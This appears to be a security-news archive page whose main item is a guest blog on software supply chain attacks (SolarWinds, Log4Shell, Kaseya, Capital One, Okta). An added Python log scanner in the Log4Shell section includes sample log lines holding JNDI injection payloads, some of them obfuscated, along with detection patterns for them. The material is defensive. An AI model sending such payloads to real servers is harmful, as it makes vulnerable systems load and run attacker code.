UK nuclear regulators step up monitoring of French giant EDF’s cybersecurity measures
Monthly Archives: July 2022
USN-5509-1: Dovecot vulnerability
Julian Brook discovered that Dovecot incorrectly handled multiple passdb
configuration entries. In certain configurations, a remote attacker could
possibly use this issue to escalate privileges.
Online Payment Fraud to Top $343bn Over Next Five Years
Juniper Research predicts online fraud is set to grow despite improving ID verification measures
McAfee and Telstra Partner to Bring Privacy, Identity and Security to Australian Customers
McAfee announces a partnership that will grant new and existing Telstra customers easy access to McAfee’s leading security solutions to deliver holistic security and privacy protection through its integrated suite of services including Antivirus, Parental Controls, Identity Protection, Secure VPN and more, to protect and secure multiple devices including mobiles, PCs and laptops. The partnership brings added protection to Telstra’s millions of customers and their devices via McAfee’s intuitive and integrated consumer security platform.
“A recent McAfee study found 27% of Australians surveyed reported attempted account theft and 23% had experienced financial account information leaks,” said Pedro Gutierrez, Senior Vice President of Global Sales and Operations at McAfee. “As the proliferation of life online accelerates, we are thrilled to be partnering with Telstra who are showing through this collaboration, a commitment to innovation and to their customers by investing in new infrastructure and technologies that safeguard their mobile and broadband subscribers.”
McAfee’s integrated consumer security platform offers a wide array of mobile security solutions to protect customers’ privacy and identity while blocking viruses, malware, spyware, and ransomware attacks. This partnership allows Telstra’s customers to take advantage of these capabilities and protect themselves from additional threats including potential hacks, identity theft and broader gaps in online and mobile security so they can live life confidently online.
“In today’s increasingly connected world the risk of cyber threats continues to grow. To counter the risk, Telstra is committed to providing our customers with the safety and security features needed to protect them online,” said Matthew O’Brien, Cyber Security Executive and Group Owner at Telstra. “This partnership with McAfee helps drive our mission to build a safe and secure connected future where everyone can thrive, and further complements Telstra’s T25 ambition to extend our network leadership position by delivering greater value to our customers.”
To activate Device Security, Telstra customers can simply go in-store, online or to their MyTelstra app. The full suite of McAfee features supported include Antivirus/System Scan, Safe Browsing, Protection Center, Identity Protection, Password Manager, Parental Controls, Protection Score and Secure VPN. All eligible Telstra customers can try Device Security for three months on Telstra, then auto-roll onto $10/month after.
Nigerian Prison Break
There was a massive prison break in Abuja, Nigeria:
Armed with bombs, Rocket Propelled Grenade (RPGs) and General Purpose Machine Guns (GPMG), the attackers, who arrived at about 10:05 p.m. local time, gained access through the back of the prison, using dynamites to destroy the heavily fortified facility, freeing 600 out of the prison’s 994 inmates, according to the country’s defense minister, Bashir Magashi….
What’s interesting to me is how the defenders got the threat model wrong. That attack isn’t normally associated with a prison break; it sounds more like a military action in a civil war.
5 Common blind spots that make you vulnerable to supply chain attacks
This blog was written by an independent guest blogger.
Over the past several years, hackers have gone from targeting only companies to also targeting their supply chain. One area of particular vulnerability is company software supply chains, which are becoming an increasingly common method of gaining access to valuable business information. A study by Gartner predicted that by 2025, 45% of companies will have experienced a supply chain attack.
Supply chain attacks can come in various ways, whether by malicious code injected into enterprise software or vulnerabilities in software your company uses. To mitigate this risk, companies must learn about the methods used to execute attacks and understand their company’s blind spots.
This article will look at 5 recent software supply chain attacks and how third-party partners can pose a security risk to your company. We’ll make recommendations for how to secure your business against supply chain attacks and how you can engage in early detection to respond to threats before they take down your enterprise.
What is a software supply chain attack?
CISA, the US Cybersecurity and Infrastructure Security Agency, defines a software supply chain attack as an attack that “occurs when a cyber threat actor infiltrates a software vendor’s network and employs malicious code to compromise the software before the vendor sends it to their customers. The compromised software then compromises the customer’s data or system.”
A software supply chain includes any company you purchase software from and any open-source software and public repositories from which your developers pull code. It also includes any service organizations that have access to your data. In the aggregate, all of these different suppliers exponentially increase the surface area of a potential attack.
Software supply chain attacks are particularly dangerous because the software supply chain acts as an amplifier for hackers. This means that when one vendor is impacted, hackers can potentially reach any of their customers, giving them greater reach than if they attacked a single target corporation.
Two primary reasons contribute to the danger, according to CISA:
Third-party software products usually require privileged access;
They often require frequent communication between the vendor’s own network and the vendor’s software on customer networks.
Attackers use that privileged access, and the privileged network channel behind it, as their initial foothold. Depending on the level of access available, they can reach many devices and layers of an organization. Some industries, like healthcare, are particularly vulnerable because they hold huge volumes of patient data subject to strict compliance regulations and laws.
Five major supply chain attacks
In recent memory, software supply chain attacks have gathered increased attention from the public because of how damaging they can be to a company and its reputation. The Log4j vulnerability demonstrated just how vulnerable companies can be to relying on third-party software, for example. Other high-profile attacks like the SolarWinds SUNBURST attack and Kaseya VSA (REvil) attack also provided painful reminders of how damaging supply chain attacks can be.
The SolarWinds SUNBURST backdoor
On December 13th, 2020, the SUNBURST backdoor was first disclosed. The attack used the popular SolarWinds Orion IT monitoring and management suite to deliver a trojanized update.
The backdoor targeted services running the Orion software and was aimed at the US Treasury and Commerce Department. It was also noted that Fortune 500 and telecommunications companies, other government agencies, and universities were potentially impacted too.
In this case, the primary blind spot for companies was their application servers and the software update pathways feeding them. The best defense against this type of attack is to monitor those devices and the update channel itself.
Reports indicated that the command-and-control (C2) domain avsvmcloud[.]com was registered as early as February 26th, 2020. Like other supply chain attacks, the SUNBURST backdoor used a period of dormancy so that any anomalous behavior would not be linked to the recent software update.
Of particular concern in the SUNBURST backdoor is also that dedicated servers were targeted. Often, these types of servers are less frequently monitored. Preventing SUNBURST backdoor-style attacks requires active monitoring at all levels of a company’s network.
Log4Shell / Log4j Exploit and Open Source Software vulnerabilities
Another concerning class of vulnerability is open source software vulnerabilities. The Log4Shell / Log4j exploit targeted the Java-based Apache logging library Log4j. It allowed attackers to execute code remotely, up to taking full control of the server. Log4Shell was a zero-day vulnerability, meaning attackers knew of it before the software’s maintainers did. Because the flaw was in a widely used open-source library, any of the 3 billion or more devices that run Java were potentially impacted.
Resolving the Log4Shell exploit and similar vulnerabilities requires having a complete inventory of all networked devices in your network. It means utilizing a system for discovering devices, monitoring for Log4Shell activity, and patching impacted devices as quickly as possible.
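As an added illustration of the “monitoring for Log4Shell activity” step above (example code written for this page, not from the article or any vendor tool), the following Python scanner runs over constructed web-server log lines and flags requests that carry a JNDI lookup string. It goes a little beyond a plain substring match: it URL-decodes each line and flattens nested `${...}` lookups first, since those two encodings are the common ways a naive `jndi:` check is defeated. All log lines, IP addresses and hostnames are constructed (documentation ranges and `.invalid` names), not real incident data.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for the demo; not from the page or any real incident.
SAMPLE_LOGS = [
    '203.0.113.10 - - [12/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://198.51.100.7/x}"',
    '198.51.100.7 - - [12/Dec/2021:10:01:09 +0000] "GET /api/v1/user HTTP/1.1" 200 88 "-" "${${lower:j}ndi:rmi://198.51.100.7/y}"',
    '203.0.113.11 - - [12/Dec/2021:10:02:00 +0000] "POST /search?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%7D HTTP/1.1" 302 0 "-" "curl/7.79"',
]

# An inner lookup such as ${lower:j} or ${env:MISSING:-j}. The jndi key itself is
# excluded by the lookahead so the marker we are hunting for is never collapsed away.
INNER_LOOKUP = re.compile(r'\$\{(?!jndi:)[A-Za-z]+:([^${}]*)\}', re.IGNORECASE)

# The lookup that matters, matched only after normalization. Schemes are the
# JNDI transports commonly listed in public detection rules.
JNDI = re.compile(r'\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:', re.IGNORECASE)


def _collapse(match):
    """Replace an inner lookup with the text it would resolve to."""
    body = match.group(1)
    # ${key:name:-default}: Log4j substitutes the default after ":-" when the
    # variable is unset, which is the form an obfuscated payload relies on.
    return body.split(':-', 1)[1] if ':-' in body else body


def normalize(text, max_rounds=5):
    """URL-decode and flatten nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        flattened = INNER_LOOKUP.sub(_collapse, decoded)
        if flattened == text:
            break
        text = flattened
    return text


def scan_line(line):
    """Return the JNDI transport scheme found in the line, or None if it is clean."""
    match = JNDI.search(normalize(line))
    return match.group(1).lower() if match else None


def scan_logs(lines):
    """Return (line_number, scheme, raw_line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        scheme = scan_line(line)
        if scheme:
            hits.append((number, scheme, line))
    return hits


if __name__ == '__main__':
    for number, scheme, line in scan_logs(SAMPLE_LOGS):
        print(f'line {number}: JNDI lookup via {scheme}: {line}')
```

To run it over a real access log, pass `open(path).read().splitlines()` to `scan_logs`. Note the limit of this kind of check: it only sees what the web server logged (request line, referer, user agent), so a lookup string sent in an unlogged header never reaches it. That is why the article pairs log monitoring with a device inventory and prompt patching rather than relying on detection alone.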
Kaseya VSA attack and Managed Services and Software Ransomware
The primary purpose of utilizing supply chain attacks is to exploit supplier vulnerabilities and attack downstream targets. That’s exactly what REvil, the ransomware group, did when they hijacked Kaseya VSA, a remote monitoring and managed services platform for IT systems and their customers.
By attacking a vulnerability in the Kaseya VSA, REvil was able to send ransomware downstream to up to 1,500 companies that were customers of Kaseya VSA.
In this case, the blind spot was internet-facing devices, devices under remote management, and the communication pathways of the managed service provider. The problem was caused by giving the vendor access to internal IT systems. Best practices to avoid a situation like this would be to monitor channels the managed service provider utilizes. Additionally, behavior analysis should track any unexpected behavior and analyze it to stop ransomware.
The Capital One attack and cloud infrastructure security flaws
Not all attacks are well-coordinated endeavors performed by elite hacking groups. Capital One experienced an extensive data breach when an Amazon employee leveraged insider knowledge of Amazon Web Services (AWS) to steal 100 million credit card applications. The attack publicized the dangers of utilizing cloud infrastructure.
The main blind spot with this attack was that utilizing a cloud service provider requires a customer to place vast amounts of trust in their vendor. This arrangement also means accepting the risk that if the cloud provider is compromised, your data may get compromised too. To combat these types of attacks, it’s key to engage in behavioral monitoring of your services and secure the edge of your network.
Bring Your Own Device (BYOD) vulnerabilities and vendor devices
In March of 2022, the globally recognized cybersecurity firm Okta revealed that one of its vendors (Sitel) had experienced a breach through the laptop of an employee providing customer service functions. The extent of the breach was limited: only two Okta authentication systems were accessed, and no customer accounts or configuration changes were made. Nonetheless, subcontractor devices and bring your own device policies represent an additional attack vector.
Unmanaged and unsanctioned devices on your network increase the potential attack surface every time an additional device is added. Companies lack information on which devices are connected, what software they’re running, and what precautions are being taken to protect against malware. Minimizing risk in this area requires creating an asset inventory and limiting access to these rogue devices. Finally, network monitoring and behavioral analysis can be used to stop attacks in their tracks.
Ransomware Attack Hits French Telecoms Firm
La Poste Mobile is urging customers to be vigilant following the incident
Understanding your API attack surface: How to get started
We live in a world of cloud computing, mobile devices and microservices. Nearly every application we interact with is powered by APIs, often many, especially when dealing with the leading cloud service providers (CSPs), mobile applications and microservice environments. This makes APIs a critical part of an organization’s attack surface.
Akamai estimates that roughly 83% of internet traffic is API-based. Other studies, such as those from Salt Security, state that API attacks increased over 600% from 2021 to 2022, and Gartner predicts that 90% of web-enabled applications will have broader attack surfaces due to exposed APIs. The latest study from Imperva claims that vulnerable APIs are costing organizations between $40 and $70 billion annually.
ZDI-22-962: Trend Micro Maximum Security Out-Of-Bounds Read Information Disclosure Vulnerability
This vulnerability allows local attackers to disclose sensitive information on affected installations of Trend Micro Maximum Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
ZDI-22-960: Linux Kernel LightNVM Subsystem Heap-based Overflow Privilege Escalation Vulnerability
This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability.